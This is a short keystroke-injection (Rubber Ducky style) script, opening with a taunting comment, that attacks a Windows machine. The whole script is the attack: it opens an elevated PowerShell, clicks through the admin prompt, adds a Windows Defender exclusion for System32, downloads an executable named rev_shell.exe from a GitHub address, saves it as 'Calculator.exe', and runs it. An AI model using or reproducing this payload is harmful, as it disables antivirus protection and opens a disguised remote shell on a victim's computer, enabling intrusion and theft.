REM you are so fucked 

DELAY 100
GUI r 
DELAY 1000
STRING powershell
DELAY 100
ENTER
DELAY 1000
STRING start-process PowerShell -verb runas
DELAY 100
ENTER
DELAY 3000 
LEFT 
DELAY 100
ENTER
DELAY 500
STRING Add-MpPreference -ExclusionPath "C:\Windows\System32"
ENTER
DELAY 100
STRING wget https://github.com/AlexanderBissett/
STRING Yurii-is-a-idiot/raw/main/rev_shell.exe -o Calculator.exe
ENTER 
DELAY 1000
STRING .\Calculator.exe
DELAY 100
ENTER
DELAY 100
STRING exit
ENTER
DELAY 100
STRING exit
ENTER